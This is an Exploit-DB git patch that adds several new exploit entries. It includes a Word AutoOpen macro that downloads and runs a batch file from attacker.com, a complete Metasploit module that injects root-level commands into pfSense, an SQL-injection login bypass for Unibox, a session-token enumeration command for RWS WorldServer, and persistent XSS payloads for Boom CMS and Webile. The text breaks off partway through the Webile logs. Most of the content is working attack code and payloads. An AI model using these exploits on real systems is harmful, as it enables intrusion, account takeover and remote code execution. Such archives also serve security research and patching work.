From 98cdb051068f442c05d9c11f507a02a5bb7c3b61 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 21 Jul 2023 00:16:29 +0000 Subject: [PATCH] DB: 2023-07-21 10 changes to exploits/shellcodes/ghdb Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. RWS WorldServer 11.7.3 - Session Token Enumeration Aures Booking & POS Terminal - Local Privilege Escalation Boom CMS v8.0.7 - Cross Site Scripting PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities pfSense v2.7.0 - OS Command Injection Webile v1.0.1 - Multiple Cross Site Scripting Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection RaidenFTPD 2.4.4005 - Buffer Overflow (SEH) --- exploits/multiple/remote/51609.txt | 43 +++++ exploits/multiple/webapps/51619.txt | 176 +++++++++++++++++++ exploits/php/webapps/51608.rb | 244 ++++++++++++++++++++++++++ exploits/php/webapps/51610.txt | 111 ++++++++++++ exploits/php/webapps/51612.txt | 206 ++++++++++++++++++++++ exploits/php/webapps/51616.txt | 240 ++++++++++++++++++++++++++ exploits/php/webapps/51617.txt | 185 ++++++++++++++++++++ exploits/php/webapps/51618.txt | 257 ++++++++++++++++++++++++++++ exploits/windows/local/51611.py | 59 +++++++ files_exploits.csv | 9 + 10 files changed, 1530 insertions(+) create mode 100644 exploits/multiple/remote/51609.txt create mode 100644 exploits/multiple/webapps/51619.txt create mode 100755 exploits/php/webapps/51608.rb create mode 100644 exploits/php/webapps/51610.txt create mode 100644 exploits/php/webapps/51612.txt create mode 100644 exploits/php/webapps/51616.txt create mode 100644 exploits/php/webapps/51617.txt create mode 100644 exploits/php/webapps/51618.txt create mode 100755 exploits/windows/local/51611.py diff --git a/exploits/multiple/remote/51609.txt b/exploits/multiple/remote/51609.txt new file mode 100644 index 000000000..a666ced0f --- /dev/null +++ b/exploits/multiple/remote/51609.txt @@ -0,0 +1,43 @@ +## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. +## Author: nu11secur1ty +## Date: 07.18.2023 +## Vendor: https://www.microsoft.com/ +## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office +## Reference: https://portswigger.net/web-security/access-control +## CVE-2023-33148 + + +## Description: +The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to +Elevation of Privilege. +The attacker can use this vulnerability to attach a very malicious +WORD file in the Outlook app which is a part of Microsoft Office 365 +and easily can trick the victim to click on it - opening it and +executing a very dangerous shell command, in the background of the +local PC. This execution is without downloading this malicious file, +and this is a potential problem and a very dangerous case! This can be +the end of the victim's PC, it depends on the scenario. + +## Staus: HIGH Vulnerability + +[+]Exploit: + +- Exploit Server: + +```vb +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s +https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat +&& .\salaries.bat", vbNormalFocus) +End Sub + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148) + +## Proof and Exploit +[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html) + +## Time spend: +00:35:00 \ No newline at end of file diff --git a/exploits/multiple/webapps/51619.txt b/exploits/multiple/webapps/51619.txt new file mode 100644 index 000000000..201e0b090 --- /dev/null +++ b/exploits/multiple/webapps/51619.txt @@ -0,0 +1,176 @@ +Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration +Session tokens in RWS WorldServer have a low entropy and can be +enumerated, leading to unauthorised access to user sessions. + + +Details +======= + +Product: WorldServer +Affected Versions: 11.7.3 and earlier versions +Fixed Version: 11.8.0 +Vulnerability Type: Session Token Enumeration +Security Risk: high +Vendor URL: https://www.rws.com/localization/products/additional-solutions/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001 +Advisory Status: published +CVE: CVE-2023-38357 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357 + + +Introduction +============ + +"WorldServer offers a flexible, enterprise-class translation management +system that automates translation tasks and greatly reduces the cost of +supporting large volumes of local language content." + +(from the vendor's homepage) + + +More Details +============ + +WorldServer associates user sessions with numerical tokens, which always +are positive values below 2^31. The SOAP action "loginWithToken" allows +for a high amount of parallel attempts to check if a token is valid. +During analysis, many assigned tokens were found to be in the 7-digit +range of values. An attacker is therefore able to enumerate user +accounts in only a few hours. + + +Proof of Concept +================ + +In the following an example "loginWithToken" request is shown: + +----------------------------------------------------------------------- +POST /ws/services/WSContext HTTP/1.1 +Content-Type: text/xml;charset=UTF-8 +SOAPAction: "" +Content-Length: 501 +Host: www.example.com +Connection: close +User-Agent: agent + + + + + + FUZZ + + + +----------------------------------------------------------------------- + +It can be saved as file "login-soap.req" and be used as a request +template for the command-line HTTP enumerator monsoon [1] to achieve +many parallel requests: + +----------------------------------------------------------------------- +$ monsoon fuzz --threads 100 \ +--template-file login-soap.req \ +--range 1-2147483647 \ +--hide-pattern "InvalidSessionException" \ +'https://www.example.com' + +Target URL: https://www.example.com/ + + status header body value extract + + 500 191 560 5829099 + 500 191 556 6229259 + 200 191 3702 7545136 + 500 191 556 9054984 +[...] +processed 12000000 HTTP requests in 2h38m38s +4 of 12000000 requests shown, 1225 req/s +----------------------------------------------------------------------- + +The --range parameter reflects the possible value range of 2^31 and for +each value an HTTP request is sent to the WorldServer SOAP API where the +FUZZ marker in the request template is replaced with the respective +value. Also responses are hidden which contain "InvalidSessionException" +as these sessions are invalid. Responses will yield a status code of 200 +if an administrative session token is found. For an unprivileged user +session, status code 500 is returned. + + +Workaround +========== + +Lower the rate at which requests can be issued, for example with a +frontend proxy. + + +Fix +=== + +According to the vendor, upgrading to versions above 11.8.0 resolves the +vulnerability. + + +Security Risk +============= + +Attackers can efficiently enumerate session tokens. In a penetration +test, it was possible to get access to multiple user accounts, including +administrative accounts using this method in under three hours. +Additionally, by using such an administrative account it seems likely to +be possible to execute arbitrary code on the underlying server by +customising the REST API [2]. Thus, the vulnerability poses a high risk. + + +Timeline +======== + +2023-03-27 Vulnerability identified +2023-03-30 Customer approved disclosure to vendor +2023-04-03 Requested security contact from vendor +2023-04-06 Vendor responded with security contact +2023-04-14 Advisory sent to vendor +2023-04-18 Vendor confirms vulnerability and states that it was already +known and fixed in version 11.8.0. +2023-07-03 Customer confirms update to fixed version +2023-07-05 CVE ID requested +2023-07-15 CVE ID assigned +2023-07-19 Advisory released + +References +========== + +[1] https://github.com/RedTeamPentesting/monsoon +[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + + +Working at RedTeam Pentesting +============================= + +RedTeam Pentesting is looking for penetration testers to join our team +in Aachen, Germany. If you are interested please visit: +https://jobs.redteam-pentesting.de/ + +-- +RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Alter Posthof 1 Fax : +49 241 510081-99 +52062 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/exploits/php/webapps/51608.rb b/exploits/php/webapps/51608.rb new file mode 100755 index 000000000..942328401 --- /dev/null +++ b/exploits/php/webapps/51608.rb @@ -0,0 +1,244 @@ +# Exploit Title: pfSense v2.7.0 - OS Command Injection +#Exploit Author: Emir Polat +# CVE-ID : CVE-2023-27253 + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'pfSense Restore RRD Data Command Injection', + 'Description' => %q{ + This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of + pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" + privilege to execute arbitrary operating system commands as the "root" user. + + This module has been tested successfully on version 2.6.0-RELEASE. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Emir Polat', # vulnerability discovery & metasploit module + ], + 'References' => [ + ['CVE', '2023-27253'], + ['URL', 'https://redmine.pfsense.org/issues/13935'], + ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] + ], + 'DisclosureDate' => '2023-03-18', + 'Platform' => ['unix'], + 'Arch' => [ ARCH_CMD ], + 'Privileged' => true, + 'Targets' => [ + [ 'Automatic Target', {}] + ], + 'Payload' => { + 'BadChars' => "\x2F\x27", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic netcat' + } + }, + 'DefaultOptions' => { + 'RPORT' => 443, + 'SSL' => true + }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] + } + ) + ) + + register_options [ + OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), + OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) + ] + end + + def check + unless login + return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") + end + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), + 'method' => 'GET', + 'keep_cookies' => true + ) + + return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? + return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 + + unless res&.body&.include?('Diagnostics: ') + return Exploit::CheckCode::Safe('Vulnerable module not reachable') + end + + version = detect_version + unless version + return Exploit::CheckCode::Detected('Unable to get the pfSense version') + end + + unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') + return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") + end + + Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") + end + + def login + # Skip the login process if we are already logged in. + return true if @logged_in + + csrf = get_csrf('index.php', 'GET') + unless csrf + print_error('Could not get the expected CSRF token for index.php when attempting login!') + return false + end + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'method' => 'POST', + 'vars_post' => { + '__csrf_magic' => csrf, + 'usernamefld' => datastore['USERNAME'], + 'passwordfld' => datastore['PASSWORD'], + 'login' => '' + }, + 'keep_cookies' => true + ) + + if res && res.code == 302 + @logged_in = true + true + else + false + end + end + + def detect_version + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'method' => 'GET', + 'keep_cookies' => true + ) + + # If the response isn't a 200 ok response or is an empty response, just return nil. + unless res && res.code == 200 && res.body + return nil + end + + if (%r{Version.+(?[0-9.]+-RELEASE)\n?}m =~ res.body).nil? + nil + else + version + end + end + + def get_csrf(uri, methods) + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, uri), + 'method' => methods, + 'keep_cookies' => true + ) + + unless res && res.body + return nil # If no response was returned or an empty response was returned, then return nil. + end + + # Try regex match the response body and save the match into a variable named csrf. + if (/var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body).nil? + return nil # No match could be found, so the variable csrf won't be defined. + else + return csrf + end + end + + def drop_config + csrf = get_csrf('diag_backup.php', 'GET') + unless csrf + fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') + end + + post_data = Rex::MIME::Message.new + + post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') + post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') + post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') + post_data.add_part('', nil, nil, 'form-data; name="restorearea"') + post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') + post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s, + 'keep_cookies' => true + ) + + if res && res.code == 200 && res.body =~ // + return res.body + else + return nil + end + end + + def exploit + unless login + fail_with(Failure::NoAccess, 'Could not obtain the login cookies!') + end + + csrf = get_csrf('diag_backup.php', 'GET') + unless csrf + fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') + end + + config_data = drop_config + if config_data.nil? + fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') + end + + if (%r{(?.*?)} =~ config_data).nil? + fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') + end + config_data.gsub!(' ', '${IFS}') + send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") + + post_data = Rex::MIME::Message.new + + post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') + post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') + post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') + post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') + post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') + post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') + post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") + post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') + post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s, + 'keep_cookies' => true + ) + + if res + print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/51610.txt b/exploits/php/webapps/51610.txt new file mode 100644 index 000000000..f068b034d --- /dev/null +++ b/exploits/php/webapps/51610.txt @@ -0,0 +1,111 @@ +# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection +# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" +# Date: 07/2023 +# Exploit Author: Ansh Jain @sudoark +# Author Contact : arkinux01@gmail.com +# Vendor Homepage: https://www.wifi-soft.com/ +# Software Link: +https://www.wifi-soft.com/products/unibox-hotspot-controller.php +# Version: Unibox Administration 3.0 & 3.1 +# Tested on: Microsoft Windows 11 +# CVE : CVE-2023-34635 +# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 + +The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to +SQL Injection, which can lead to unauthorised admin access for attackers. +The vulnerability occurs because of not validating or sanitising the user +input in the username field of the login page and directly sending the +input to the backend server and database. + +## How to Reproduce +Step 1 : Visit the login page and check the version, whether it is 3.0, +3.1, or not. +Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and +enter any random password. +Step 3 : Fill in the captcha and hit login. After hitting login, you have +been successfully logged in as an administrator and can see anyone's user +data, modify data, revoke access, etc. + + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Login Request +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +----------------------------------------------------------------------------------------------------------------------- +Parameters: username, password, captcha, action +----------------------------------------------------------------------------------------------------------------------- + +POST /index.php HTTP/2 +Host: 255.255.255.255.host.com +Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 83 +Origin: https://255.255.255.255.host.com +Referer: https://255.255.255.255.host.com/index.php +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Login Response +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +HTTP/2 302 Found +Server: nginx +Date: Tue, 18 Jul 2023 13:32:14 GMT +Content-Type: text/html; charset=UTF-8 +Location: ./dashboard/dashboard +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Successful Loggedin Request +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +GET /dashboard/dashboard HTTP/2 +Host: 255.255.255.255.host.com +Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 +Firefox/102.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://255.255.255.255.host.com/index.php +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +### Successful Loggedin Response +-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +HTTP/2 200 OK +Server: nginx +Date: Tue, 18 Jul 2023 13:32:43 GMT +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Cache_control: private + + + + +html content + \ No newline at end of file diff --git a/exploits/php/webapps/51612.txt b/exploits/php/webapps/51612.txt new file mode 100644 index 000000000..ea4cc4e5b --- /dev/null +++ b/exploits/php/webapps/51612.txt @@ -0,0 +1,206 @@ +# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting +References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274 +Release Date: 2023-07-03 +Vulnerability Laboratory ID (VL-ID): 2274 + +Product & Service Introduction: +=============================== +Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life +easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. +It gives editors control but doesn't require any technical knowledge. + +(Copy of the Homepage:https://www.boomcms.net/boom-boom ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. + + +Affected Product(s): +==================== +UXB London +Product: Boom v8.0.7 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2022-07-24: Researcher Notification & Coordination (Security Researcher) +2022-07-25: Vendor Notification (Security Department) +2023-**-**: Vendor Response/Feedback (Security Department) +2023-**-**: Vendor Fix/Patch (Service Developer Team) +2023-**-**: Security Acknowledgements (Security Department) +2023-07-03: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (User Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The vulnerability is located in the input fields of the album title and album description in the asset-manager module. +Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. +After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets. +The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse +the content by usage of a backslash. Thus does not have any impact to inject own malicious +java-scripts because of its only performed for double- and single-quotes to prevent sql injections. + +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] assets-manager (album) + +Vulnerable Function(s): +[+] add + +Vulnerable Parameter(s): +[+] title +[+] description + +Affected Module(s): +[+] Frontend (Albums) +[+] Backend (Albums Assets) + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. +For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Login to the application as restricted user +2. Create a new album +3. Inject a test script code payload to title and description +4. Save the request +5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution +6. Successful reproduce of the persistent cross site web vulnerability! + + +Payload(s): +>
test + + +--- PoC Session Logs (Inject) --- +https://localhost:8000/boomcms/album/35 +Host: localhost:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/json +X-Requested-With: XMLHttpRequest +Content-Length: 263 +Origin:https://localhost:8000 +Connection: keep-alive +Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] +Sec-Fetch-Site: same-origin +{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", +"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" +:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} +- +PUT: HTTP/1.1 200 OK +Server: Apache +Cache-Control: no-cache, private +Set-Cookie: Max-Age=7200; path=/ +Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF +VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY +yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; +Max-Age=7200; path=/; httponly +Content-Length: 242 +Connection: Keep-Alive +Content-Type: application/json +- +https://localhost:8000/boomcms/asset-manager/albums/[evil.source] +Host: localhost:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF +VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY +yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; +- +GET: HTTP/1.1 200 OK +Server: Apache +Cache-Control: no-cache, private +Set-Cookie: +Vary: Accept-Encoding +Content-Length: 7866 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- + + +Vulnerable Source: asset-manager/albums/[ID] + +
  • + +
    +

    [MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]

    +

    "><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]>

    +

    0 assets

    +
    +     +
    • +

    + + +
    +
    +
    +
    +

    <[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]>

    +

    <[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]>

    +
    + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters. +Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability in the application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab \ No newline at end of file diff --git a/exploits/php/webapps/51616.txt b/exploits/php/webapps/51616.txt new file mode 100644 index 000000000..60ac9527d --- /dev/null +++ b/exploits/php/webapps/51616.txt @@ -0,0 +1,240 @@ +Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2321 + + +Release Date: +============= +2023-07-03 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2321 + + +Common Vulnerability Scoring System: +==================================== +5.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in +the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, +statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other +functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac, +Windows, Linux, iOS, Android and other multi-platform operating systems. + +(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application. + +Affected Product(s): +==================== +Product Owner: Webile +Product: Webile v1.0.1 - (Framework) (Mobile Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2022-10-11: Researcher Notification & Coordination (Security Researcher) +2022-10-12: Vendor Notification (Security Department) +2022-**-**: Vendor Response/Feedback (Security Department) +2022-**-**: Vendor Fix/Patch (Service Developer Team) +2022-**-**: Security Acknowledgements (Security Department) +2023-07-03: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (Guest Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application. +The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious +script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content. + +Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious +source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] new_file_name +[+] i + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. +For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. + + +Vulnerable Source: Send +Send message to phone listing +
    +
    Message
    +
    +
    20:10:11  
    +test2"

    +
    +history logs messages + + + + + + + + + + + +
    +
    		MessageDateAction
    +
    +    		 test2"2022/07/17 20:10 + +   + + +   +
    + + + +--- PoC Session Logs #1 (POST) --- (Add) +http://localhost:8080/file_action +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 210 +Origin:http://localhost:8080 +Connection: keep-alive +Referer:http://localhost:8080/webile_files +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>""} +- +POST: HTTP/1.1 200 OK +Content-Type: application/json +Connection: keep-alive +Content-Encoding: gzip +Transfer-Encoding: chunked +- +http://localhost:8080/evil.source +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer:http://localhost:8080/webile_files +Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Content-Type: application/octet-stream +Connection: keep-alive +Content-Length: 0 +- +Cookie: +treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 + + + +--- PoC Session Logs #2 (POST) --- (Send) +http://localhost:8080/send +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate 